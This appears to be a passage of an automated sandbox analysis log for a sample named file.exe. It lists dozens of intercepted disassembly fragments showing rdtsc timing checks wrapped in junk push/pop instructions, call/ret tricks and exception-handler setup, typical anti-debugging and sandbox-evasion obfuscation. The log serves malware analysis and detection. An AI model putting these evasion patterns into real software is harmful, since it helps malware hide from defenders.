Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C92D95 second address: C92DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FCD4346Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F29FCD43471h 0x00000016 popad 0x00000017 jmp 00007F29FCD43478h 0x0000001c jmp 00007F29FCD43477h 0x00000021 popad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jnp 00007F29FCD43466h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C92F71 second address: C92F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C930F2 second address: C930F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96E0E second address: C96E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96E12 second address: C96E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96E1C second address: C96E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518341h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F29FC51833Ch 0x00000014 pushad 0x00000015 jc 00007F29FC518336h 0x0000001b jng 00007F29FC518336h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6821D second address: C68236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F29FCD43472h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68236 second address: C6823A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99AD0 second address: C99ADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99ADC second address: C99AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C99AE0 second address: C99AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0003 second address: CA000B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA000B second address: CA0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29FCD43471h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F6F7 second address: C9F705 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F705 second address: C9F709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F709 second address: C9F724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F29FC518336h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FCD5 second address: C9FD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F29FCD43466h 0x0000000a popad 0x0000000b jmp 00007F29FCD4346Dh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jbe 00007F29FCD43466h 0x0000001a jmp 00007F29FCD4346Ah 0x0000001f pop eax 0x00000020 jl 00007F29FCD4346Ch 0x00000026 js 00007F29FCD43466h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEAC second address: C9FEC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC518347h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEC8 second address: C9FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29FCD43466h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F29FCD43466h 0x00000014 jmp 00007F29FCD4346Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA200C second address: CA2026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518346h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA27EB second address: CA27F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2D8A second address: CA2D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2D8E second address: CA2D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2D9A second address: CA2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29FC518336h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2DA9 second address: CA2DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2F67 second address: CA2F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA301B second address: CA301F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA32B4 second address: CA32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA521E second address: CA5222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5222 second address: CA5228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5C92 second address: CA5C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5A49 second address: CA5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5A4D second address: CA5A72 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FCD43466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FCD43479h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA731F second address: CA739B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F29FC518338h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 and di, 1387h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F29FC518338h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 and di, 9FA1h 0x0000004b mov esi, dword ptr [ebp+12460ED6h] 0x00000051 jmp 00007F29FC518342h 0x00000056 xchg eax, ebx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a ja 00007F29FC518336h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA739B second address: CA739F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA709B second address: CA70B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518345h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAC6F5 second address: CAC6FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FCD43466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD94F second address: CAD955 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD955 second address: CAD968 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F29FCD43468h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE9AC second address: CAE9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD968 second address: CAD9F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D3248h], eax 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov edi, dword ptr [ebp+122D1883h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov ebx, dword ptr [ebp+122D3819h] 0x00000029 mov eax, dword ptr [ebp+122D0225h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F29FCD43468h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+1245A293h], edi 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F29FCD43468h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b movzx edi, cx 0x0000006e push eax 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F29FCD43473h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF859 second address: CAF863 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE9B8 second address: CAE9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0694 second address: CB0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE9BE second address: CAE9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0698 second address: CB069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE9C3 second address: CAE9CD instructions: 0x00000000 rdtsc 0x00000002 je 00007F29FCD4346Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB069C second address: CB06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB06A9 second address: CB06AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB16DA second address: CB16DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB16DF second address: CB1788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F29FCD43470h 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D3951h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F29FCD43468h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 add dword ptr [ebp+122D2F4Bh], edi 0x0000003a mov edi, ebx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F29FCD43468h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 0000001Dh 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov ebx, ecx 0x0000005a pushad 0x0000005b mov dword ptr [ebp+12452DD4h], edx 0x00000061 js 00007F29FCD43479h 0x00000067 jmp 00007F29FCD43473h 0x0000006c popad 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F29FCD4346Fh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1788 second address: CB17A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518345h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB19B1 second address: CB19B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB19B7 second address: CB19D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F29FC51833Ch 0x00000014 jns 00007F29FC518336h 0x0000001a je 00007F29FC51833Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB28DD second address: CB28EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB66D5 second address: CB66DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB875B second address: CB875F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4822 second address: CB4828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6851 second address: CB6856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5778 second address: CB5805 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bh, D8h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push ebx 0x00000014 mov dword ptr [ebp+12468E0Eh], eax 0x0000001a pop ebx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 call 00007F29FC518341h 0x00000027 mov di, B110h 0x0000002b pop ebx 0x0000002c jnc 00007F29FC51833Ch 0x00000032 mov eax, dword ptr [ebp+122D050Dh] 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F29FC518338h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 push FFFFFFFFh 0x00000054 mov bl, A0h 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jo 00007F29FC518336h 0x00000060 jmp 00007F29FC518345h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB77D9 second address: CB77DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB875F second address: CB876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6856 second address: CB686A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F29FCD43466h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5805 second address: CB5822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F29FC518336h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F29FC51833Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB77DD second address: CB77E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB876D second address: CB8773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB686A second address: CB686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB77E3 second address: CB77E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8773 second address: CB877E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F29FCD43466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB686E second address: CB6874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB877E second address: CB87CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F29FCD43468h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D36D1h] 0x0000002a mov bl, 03h 0x0000002c mov edi, dword ptr [ebp+122D1883h] 0x00000032 push 00000000h 0x00000034 mov di, B98Ch 0x00000038 add dword ptr [ebp+122D2AFAh], edx 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 pop eax 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB87CA second address: CB87D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FC518336h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA95D second address: CBA961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA961 second address: CBA96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA96B second address: CBA96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA96F second address: CBA97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C615 second address: C5C61B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C61B second address: C5C630 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F29FC51833Ch 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBAF1C second address: CBAF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29FCD43466h 0x0000000a popad 0x0000000b jnl 00007F29FCD4346Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F29FCD43466h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBAF3F second address: CBAF45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBBECF second address: CBBED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB0B5 second address: CBB0D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FC518346h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC196 second address: CBC1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC1A0 second address: CBC1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF5E6 second address: CBF5F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F29FCD43466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF5F1 second address: CBF613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29FC518344h 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD0DE second address: CBD0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
